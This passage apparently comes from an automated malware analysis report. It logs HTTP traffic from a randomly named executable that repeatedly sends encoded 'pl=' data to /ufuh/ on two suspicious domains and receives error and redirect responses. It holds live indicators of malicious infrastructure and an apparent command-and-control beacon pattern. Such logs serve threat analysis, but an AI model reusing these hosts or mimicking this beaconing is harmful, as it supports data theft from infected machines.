                                                                                            May 2, 2024 08:28:56.909734964 CEST169INHTTP/1.0 500 Internal Server Error
                                                                                            Date: Thu, 02 May 2024 06:28:56 GMT
                                                                                            Server: Apache
                                                                                            Content-Length: 0
                                                                                            Connection: close
                                                                                            Content-Type: text/html; charset=UTF-8


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            24192.168.2.224918867.223.117.189802848C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            May 2, 2024 08:28:59.305978060 CEST2578OUTPOST /ufuh/ HTTP/1.1
                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Content-Length: 3623
                                                                                            Cache-Control: no-cache
                                                                                            Connection: close
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: www.touchclean.top
                                                                                            Origin: http://www.touchclean.top
                                                                                            Referer: http://www.touchclean.top/ufuh/
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                            Data Raw: 70 6c 3d 4e 2b 33 77 63 4a 70 43 55 69 65 51 45 77 45 4f 66 58 2b 43 63 35 35 4e 2f 66 35 73 4b 4e 6e 58 30 68 52 4a 46 53 39 43 43 4a 35 69 37 54 54 78 4d 47 50 35 53 70 55 6a 55 6f 64 53 33 55 5a 4e 33 64 43 30 71 59 57 52 6c 32 76 77 4f 55 59 37 52 2f 45 50 30 44 59 73 64 47 6d 79 6f 66 32 72 6f 4a 52 36 6c 4f 41 6d 54 55 66 47 49 43 43 5a 71 66 4c 36 79 48 57 6d 52 55 38 64 75 33 78 49 78 55 2b 53 57 59 36 6a 6a 42 4c 62 79 74 63 47 59 68 6e 67 67 6c 6d 58 76 72 74 34 41 2f 6c 46 4a 35 36 30 6f 7a 71 59 4f 66 6d 74 45 74 32 47 65 62 68 44 75 6b 5a 43 65 42 44 30 34 56 62 48 2b 34 41 2b 4e 72 64 4a 39 46 42 4d 31 46 4f 39 67 6c 6c 35 65 37 6d 78 44 6c 36 5a 4f 4b 41 66 5a 45 78 35 62 48 34 72 4f 73 6b 68 50 4f 75 6e 55 56 39 39 45 71 43 31 75 43 47 36 69 5a 42 5a 71 34 64 41 2f 49 75 47 36 78 77 2f 57 46 79 62 64 56 67 4f 65 6f 61 4d 35 61 66 59 6e 6a 70 73 72 63 35 74 62 36 35 45 66 6d 35 73 56 2f 68 73 62 6d 33 75 41 69 35 59 36 31 2f 7a 7a 63 57 43 4c 61 72 51 41 74 35 64 52 2b 33 79 37 55 38 [TRUNCATED]
                                                                                            Data Ascii: pl=N+3wcJpCUieQEwEOfX+Cc55N/f5sKNnX0hRJFS9CCJ5i7TTxMGP5SpUjUodS3UZN3dC0qYWRl2vwOUY7R/EP0DYsdGmyof2roJR6lOAmTUfGICCZqfL6yHWmRU8du3xIxU+SWY6jjBLbytcGYhngglmXvrt4A/lFJ560ozqYOfmtEt2GebhDukZCeBD04VbH+4A+NrdJ9FBM1FO9gll5e7mxDl6ZOKAfZEx5bH4rOskhPOunUV99EqC1uCG6iZBZq4dA/IuG6xw/WFybdVgOeoaM5afYnjpsrc5tb65Efm5sV/hsbm3uAi5Y61/zzcWCLarQAt5dR+3y7U8SZvz1rJEGo5AFeSWCaxkOAKE08zZ629GijN2rcdBd0Y7lgddQ3puvfQgDC04gRMkHYE6QsmR+yXMoMs5S496uPN3ZI9qBIk90d5e0VJYJ37FEq1BjLy47Ae9wxZAaKcoERfHdEazW7rD/ZrWZEEsynOsFjfkQskbTtPRog7r5SFPBSe7q9kYsa4t+YQ6XUPJ82RRO9rkK28ssXRWbHdylWKFojLtrf/q7c2VMhPVeyxdEFDWBkkqrYeRBqZ6dpaY9x9pgt0xx70Mi4Gt1zLfIw4pAnpT6ZP4D5WI4o6F8TZLTZLr0B6UhTCTrE7mWtyPBlwKRnojc9I02q78qyuC246oKYkg7rCZRvIVl+eJgn4erRJUVKjK1r7i2kngxnb+PWSaz2gbg73PE1Te6bPlrjSFp2v2Pze4M7DI5RPTCEpio+WtEl3/OK/rwBBrwGUqIdrUCf/cO7KxFlH6hdu4LrUfDEdgY+h8NU42cK65nY8uklRzJSBkXoopE96M/l2qja3wi3/3sMR2jEegzZ3HRIyK1NnFR47Ph5bfNC4Quz8bNCltnBND4GkwruBq3JelVTT/kxMraWqsZFOXgxq2u92lP3pl1IRQs0se25DgUtQEunGxb7ivpN107TPXhMZNOxNrgoyqn6AkWQp4Sj8X5yz8+32Pz0bexU [TRUNCATED]
                                                                                            May 2, 2024 08:28:59.463784933 CEST1573OUTData Raw: 71 42 53 70 49 57 57 42 42 71 4b 37 55 37 61 2b 71 41 66 56 2b 45 77 57 5a 34 4b 71 38 33 43 54 2b 51 55 6b 4a 35 70 75 66 37 55 52 37 5a 49 6e 79 70 2f 45 5a 52 34 52 70 55 70 63 39 44 64 64 41 67 2f 31 51 6b 45 66 53 6f 50 55 55 6d 4d 72 4b 39
                                                                                            Data Ascii: qBSpIWWBBqK7U7a+qAfV+EwWZ4Kq83CT+QUkJ5puf7UR7ZInyp/EZR4RpUpc9DddAg/1QkEfSoPUUmMrK9lg0JZGkeUi4rfV5RUcHY/TIt8Po3sFAiHJqWq5Ks7QadhBzJc5PfDWSEfD70C05XfD2yTzzDi0HadesXnCFUpKvHvXeKUEXx6JKPcPCDV75GO5nHeHeqkvNnTnJLPb+Nltbo1f31bdBbqFYhIlfLN2fF3yLwS8piX
                                                                                            May 2, 2024 08:28:59.758326054 CEST169INHTTP/1.0 500 Internal Server Error
                                                                                            Date: Thu, 02 May 2024 06:28:59 GMT
                                                                                            Server: Apache
                                                                                            Content-Length: 0
                                                                                            Connection: close
                                                                                            Content-Type: text/html; charset=UTF-8


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            25192.168.2.224918967.223.117.189802848C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            May 2, 2024 08:29:01.993967056 CEST467OUTGET /ufuh/?pl=A8fQf/hISgzwL3oVRnqHbZBV/plXIsny1TYZTQxVDrtx1SbFVUn9YIU/QNlk/lJ+xLSyvfTMvWvwfwkJSN9/6ikOA0zWpJ/i6bk9+sgLcEv6BHfAlNSdkle4dEVn&5h1t=6H6PKFvXjtI4u8k HTTP/1.1
                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                            Connection: close
                                                                                            Host: www.touchclean.top
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                            May 2, 2024 08:29:02.288319111 CEST1289INHTTP/1.1 404 Not Found
                                                                                            Date: Thu, 02 May 2024 06:29:02 GMT
                                                                                            Server: Apache
                                                                                            Content-Length: 32106
                                                                                            Connection: close
                                                                                            Content-Type: text/html; charset=utf-8
                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 [TRUNCATED]
                                                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Fables"> <meta name="author" content="Enterprise Development"> <link rel="shortcut icon" href="assets/custom/images/shortcut.png"> <title> 404</title> ... animate.css--> <link href="assets/vendor/animate.css-master/animate.min.css" rel="stylesheet"> ... Load Screen --> <link href="assets/vendor/loadscreen/css/spinkit.css" rel="stylesheet"> ... GOOGLE FONT --> <link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i" rel="stylesheet"> ... Font Awesome 5 --> <link href="assets/vendor/fontawesome/css/fontawesome-all.min.css" rel="stylesheet"> ... Fables Icons --> <link href="assets/custom/css/fables-icons.css" rel="stylesheet"> ... Bootstrap CSS --> <link href="assets/vendor/bootstrap/css/boo [TRUNCATED]
                                                                                            May 2, 2024 08:29:02.288368940 CEST1289INData Raw: 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 41 4e 43 59 20 42 4f 58 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 66 61 6e 63 79 62 6f 78 2d 6d 61 73 74 65 72 2f 6a 71 75 65 72 79 2e 66 61
                                                                                            Data Ascii: t"> ... FANCY BOX --> <link href="assets/vendor/fancybox-master/jquery.fancybox.min.css" rel="stylesheet"> ... OWL CAROUSEL --> <link href="assets/vendor/owlcarousel/owl.carousel.min.css" rel="stylesheet"> <link href="as
                                                                                            May 2, 2024 08:29:02.288388968 CEST1289INData Raw: 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 0a 3c 2f 64 69 76 3e 0a 0a 3c 21 2d 2d 20 4c 6f 61 64 69 6e 67 20 53 63 72 65 65 6e 20 2d 2d 3e 0a 3c 64 69 76 20 69 64 3d 22 6a 75 2d 6c 6f 61 64
                                                                                            Data Ascii: </form> </div> </div>... Loading Screen --><div id="ju-loading-screen"> <div class="sk-double-bounce"> <div class="sk-child sk-double-bounce1"></div> <div class="sk-child sk-double-bounce2"></div> </div></di
                                                                                            May 2, 2024 08:29:02.288479090 CEST1289INData Raw: 73 72 63 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 46 72 61 6e 63 65 2e 70 6e 67 22 20 61 6c 74 3d 22 65 6e 67 6c 61 6e 64 20 66 6c 61 67 22 20 63 6c 61 73 73 3d 22 6d 72 2d 31 22 3e 20 46 72 65 6e 63 68 3c 2f 61 3e 20
                                                                                            Data Ascii: src="assets/custom/images/France.png" alt="england flag" class="mr-1"> French</a> </div> </div> </div> <div class="col-12 col-sm-5 col-lg-4 text-right">
                                                                                            May 2, 2024 08:29:02.288544893 CEST1289INData Raw: 70 73 65 22 20 64 61 74 61 2d 74 61 72 67 65 74 3d 22 23 66 61 62 6c 65 73 4e 61 76 44 72 6f 70 64 6f 77 6e 22 20 61 72 69 61 2d 63 6f 6e 74 72 6f 6c 73 3d 22 66 61 62 6c 65 73 4e 61 76 44 72 6f 70 64 6f 77 6e 22 20 61 72 69 61 2d 65 78 70 61 6e
                                                                                            Data Ascii: pse" data-target="#fablesNavDropdown" aria-controls="fablesNavDropdown" aria-expanded="false" aria-label="Toggle navigation"> <span class="fables-iconmenu-icon text-white font-16"></span>
                                                                                            May 2, 2024 08:29:02.288574934 CEST1289INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 75 6c 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0a 0a 20 20 20 20 20
                                                                                            Data Ascii: </ul> </li> <li class="nav-item dropdown"> <a class="nav-link dropdown-toggle" href="#" id="sub-nav2"
                                                                                            May 2, 2024 08:29:02.288691044 CEST1289INData Raw: 2e 68 74 6d 6c 22 3e 48 65 61 64 65 72 20 31 20 44 61 72 6b 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 69 74 65 6d 22 20 68 72 65 66 3d 22 68 65 61 64 65 72 2d 6d 65 67 61 6d 65 6e 75 2e 68 74
                                                                                            Data Ascii: .html">Header 1 Dark</a></li><li><a class="dropdown-item" href="header-megamenu.html">Header Mega menu</a></li> </ul> </li>
                                                                                            May 2, 2024 08:29:02.288784981 CEST1289INData Raw: 6e 73 70 61 72 65 6e 74 2e 68 74 6d 6c 22 3e 48 65 61 64 65 72 20 33 20 54 72 61 6e 73 70 61 72 65 6e 74 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                            Data Ascii: nsparent.html">Header 3 Transparent</a></li> <li><a class="dropdown-item" href="header3-light.html">Header 3 Light</a></li>
                                                                                            May 2, 2024 08:29:02.288888931 CEST1289INData Raw: 65 66 3d 22 23 22 3e 48 65 61 64 65 72 20 35 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 75 6c 20 63 6c
                                                                                            Data Ascii: ef="#">Header 5</a> <ul class="dropdown-menu"> <li><a class="dropdown-item" href="header5-transparent.html">Header 5 Transparen
                                                                                            May 2, 2024 08:29:02.288908005 CEST1289INData Raw: 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77
                                                                                            Data Ascii: <li><a class="dropdown-item" href="Footer1-light.html">Footer 1 Light</a></li> <li><a class="dropdown-item" href="Footer1-
                                                                                            May 2, 2024 08:29:02.445311069 CEST1289INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 75 6c 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 6d 65 6e 75 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                            Data Ascii: <ul class="dropdown-menu"> <li><a class="dropdown-item" href="footer3-bg-img.html">Footer 3 Transparent</a></li>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            26192.168.2.2249190154.41.250.58802848C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            May 2, 2024 08:29:08.842675924 CEST2578OUTPOST /ufuh/ HTTP/1.1
                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Content-Length: 2159
                                                                                            Cache-Control: no-cache
                                                                                            Connection: close
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: www.ibistradingco.com
                                                                                            Origin: http://www.ibistradingco.com
                                                                                            Referer: http://www.ibistradingco.com/ufuh/
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                            Data Raw: 70 6c 3d 73 65 78 33 33 46 31 2b 79 4d 4a 67 4d 69 55 73 53 31 6a 58 4c 45 50 45 2f 37 56 75 32 6e 7a 49 4e 56 33 46 6f 78 52 37 58 6e 53 6e 50 68 38 6f 59 57 62 7a 30 6d 48 70 76 5a 43 59 54 48 63 30 2b 4d 33 55 56 38 75 4a 78 73 72 53 6f 73 45 49 44 4f 4a 50 51 37 59 31 67 43 38 77 72 70 31 2f 71 4c 4f 50 6b 63 62 49 4f 4b 68 48 32 41 31 4d 61 39 52 66 4c 2f 4a 45 45 68 50 75 51 34 68 59 78 62 64 6c 2b 2b 76 57 4e 38 65 4d 4d 73 57 69 4d 44 71 7a 4f 6e 70 6f 2b 61 73 2b 67 59 48 62 31 6c 2f 70 49 46 61 51 52 7a 74 2f 5a 30 39 64 45 62 57 6e 74 65 74 31 31 37 79 68 73 49 67 42 77 67 72 47 52 42 67 6b 4a 43 67 54 76 6a 48 69 62 34 31 70 4d 77 4b 56 76 70 2f 4c 6b 34 35 59 47 66 48 39 4a 41 65 44 75 72 48 46 63 53 43 56 4e 54 33 37 51 42 52 61 6a 6a 64 38 32 4a 36 2f 45 30 4d 38 6e 38 32 38 38 69 33 48 34 4a 34 75 4b 65 35 46 53 6c 78 50 55 69 51 2f 75 48 45 39 58 35 58 57 43 72 6e 41 4b 52 68 74 78 51 55 73 59 4e 51 46 46 61 71 69 58 56 51 50 72 35 79 77 43 33 75 58 38 6e 76 61 76 6d 45 35 50 58 76 [TRUNCATED]
                                                                                            Data Ascii: pl=sex33F1+yMJgMiUsS1jXLEPE/7Vu2nzINV3FoxR7XnSnPh8oYWbz0mHpvZCYTHc0+M3UV8uJxsrSosEIDOJPQ7Y1gC8wrp1/qLOPkcbIOKhH2A1Ma9RfL/JEEhPuQ4hYxbdl++vWN8eMMsWiMDqzOnpo+as+gYHb1l/pIFaQRzt/Z09dEbWntet117yhsIgBwgrGRBgkJCgTvjHib41pMwKVvp/Lk45YGfH9JAeDurHFcSCVNT37QBRajjd82J6/E0M8n8288i3H4J4uKe5FSlxPUiQ/uHE9X5XWCrnAKRhtxQUsYNQFFaqiXVQPr5ywC3uX8nvavmE5PXvFq1Us6hmw7eSsbAOMMJrtev8cb1kLe+IvwCjRLoyl0oSYHujGfdwwHm6qJ/X6PFdoKwYhyRXl5NG9+wYAuJPn+VdK11Hekx4SkNDuD4kTxxAGzPU8Cd9um5YWh2KKWDNofwAUiEed0PZV/sIB22QYDhJmuIAdNsfl3IpxAOebaCjN+Okq7akToXSaEcL8FjritUbd3ut6uVv+C8V/Ajgf3i7TQewMcGhM9qubh5krmy17zh6C3YmvpR3HB+iy/NoRG3PtS3XowFaKJdM4T8UABRnTeBcwZJTfrK/Zt6ZuCgoMK5nxqy9WJxYZZPB8FM8sycH8fwa8kA4glV1jX+MwHw/zNK7VETp/BR00zp3S6lM3O52immDRmnw+MtpvIhd3xz6A4CDdcvlhwpT74oK1G2CfwPjXg4y2gi/p1vQYRLZws+cXPIpQoH9XyZGwNPWQPr4tzWvjybK0KouNrO/FQw0kCKnak/c6JzQ4UUQMfiUpRitPfI30QJfD3LAZcd+xXyMoS2C4IMd8dszKX3K0c8gPrXf/7F5jmry60pQbVWMLQrpyWPIvQLOmr2TGPNTCbEKm9XS6GgjPm0zHRZ+CKhJ1rmJuoz5bABSntwqiZLBKKH7mKI8xxov6O5k8vwHHOicivXBd8kb09pb5V2kHO81EL71lX2LV7 [TRUNCATED]
                                                                                            May 2, 2024 08:29:08.935570002 CEST118OUTData Raw: 65 44 71 45 4e 6b 66 51 30 71 37 5a 32 63 79 66 70 33 62 5a 4e 62 4c 67 4d 57 56 2b 4d 7a 34 64 58 4b 33 74 6d 75 4e 39 62 4d 70 51 76 74 61 54 45 4e 38 5a 35 73 62 49 2f 6c 39 6a 30 48 76 53 74 4d 5a 6a 79 56 51 6d 2f 61 7a 6f 43 63 38 4b 30 50
                                                                                            Data Ascii: eDqENkfQ0q7Z2cyfp3bZNbLgMWV+Mz4dXK3tmuN9bMpQvtaTEN8Z5sbI/l9j0HvStMZjyVQm/azoCc8K0PqD/LIfWFm53owv17bklnV781+6wRBuq6x/49
                                                                                            May 2, 2024 08:29:09.161247969 CEST1215INHTTP/1.1 301 Moved Permanently
                                                                                            Server: hcdn
                                                                                            Date: Thu, 02 May 2024 06:29:09 GMT
                                                                                            Content-Type: text/html
                                                                                            Content-Length: 795
                                                                                            Connection: close
                                                                                            location: https://www.ibistradingco.com/ufuh/
                                                                                            platform: hostinger
                                                                                            content-security-policy: upgrade-insecure-requests
                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                            x-hcdn-request-id: a54f67c612fa70fbcea8d17f71763a4a-bos-edge1
                                                                                            x-hcdn-cache-status: DYNAMIC
                                                                                            x-hcdn-upstream-rt: 0.132
                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            27192.168.2.2249191154.41.250.58802848C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            May 2, 2024 08:29:11.456959963 CEST735OUTPOST /ufuh/ HTTP/1.1
                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Content-Length: 199
                                                                                            Cache-Control: no-cache
                                                                                            Connection: close
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: www.ibistradingco.com
                                                                                            Origin: http://www.ibistradingco.com
                                                                                            Referer: http://www.ibistradingco.com/ufuh/
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                            Data Raw: 70 6c 3d 73 65 78 33 33 46 31 2b 79 4d 4a 67 4d 68 4d 73 53 6b 6a 58 4a 6b 50 45 36 37 56 75 2f 48 7a 30 4e 56 7a 38 6f 31 68 52 58 58 71 6e 50 7a 6b 6f 59 67 50 7a 7a 6d 48 71 36 70 43 6d 64 6e 64 75 2b 4d 33 69 56 39 43 4a 78 73 2f 53 70 50 38 49 54 36 56 41 49 62 59 7a 73 69 38 67 72 70 78 36 71 4d 47 66 6b 59 76 49 4f 49 6c 48 33 41 6c 4d 66 65 35 66 65 66 4a 4b 47 68 50 39 51 35 63 63 78 62 74 74 2b 2f 44 57 4e 4e 43 4d 56 59 43 69 49 53 71 7a 46 48 70 6c 6b 4b 74 62 72 74 71 78 77 57 58 48 57 31 54 32 65 7a 70 73 55 31 4e 62 4f 74 61 52 38 65 45 61 2b 4c 62 68 69 37 4a 2f 6d 51 3d 3d
                                                                                            Data Ascii: pl=sex33F1+yMJgMhMsSkjXJkPE67Vu/Hz0NVz8o1hRXXqnPzkoYgPzzmHq6pCmdndu+M3iV9CJxs/SpP8IT6VAIbYzsi8grpx6qMGfkYvIOIlH3AlMfe5fefJKGhP9Q5ccxbtt+/DWNNCMVYCiISqzFHplkKtbrtqxwWXHW1T2ezpsU1NbOtaR8eEa+Lbhi7J/mQ==
                                                                                            May 2, 2024 08:29:11.683789968 CEST1215INHTTP/1.1 301 Moved Permanently
                                                                                            Server: hcdn
                                                                                            Date: Thu, 02 May 2024 06:29:11 GMT
                                                                                            Content-Type: text/html
                                                                                            Content-Length: 795
                                                                                            Connection: close
                                                                                            location: https://www.ibistradingco.com/ufuh/
                                                                                            platform: hostinger
                                                                                            content-security-policy: upgrade-insecure-requests
                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                            x-hcdn-request-id: 06774e0986593b81910e21be858c9502-bos-edge3
                                                                                            x-hcdn-cache-status: DYNAMIC
                                                                                            x-hcdn-upstream-rt: 0.133
                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
